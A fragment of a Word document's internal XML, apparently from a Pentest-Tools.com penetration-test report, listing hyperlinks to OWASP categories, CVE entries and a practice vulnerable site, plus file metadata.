Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://php.net" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-0543" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-36021" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-21468" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/26e116bc0a7a0157.txt" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-BrokenAccessControl%202017" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/8b30710a343ac40b.txt" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/32bb003f2b5432f2.txt" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32626" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/e61072bf0239babf.txt" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A1-Injection%202017" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A6-SecurityMisconfiguration%202017" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/csp/" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server.html" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/cve-2018-2894" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/fi/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32675" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-32672" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/br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E29E-70A4-445F-AA54-2B4C7CED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3083</TotalTime>
  <Pages>105</Pages>
  <Words>14028</Words>
  <Characters>90064</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3335</Lines>
  <Paragraphs>2041</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr/>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>Pentest-Tools.com</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>102051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Doe</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sandu Dragos</cp:lastModifiedBy>
  <cp:revision>247</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-12T15:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-12T14:42:00Z</dcterms:modified>
  <cp:category/>
  <dc:identifier/>
  <dc:language/>
</cp:coreProperties>
</file>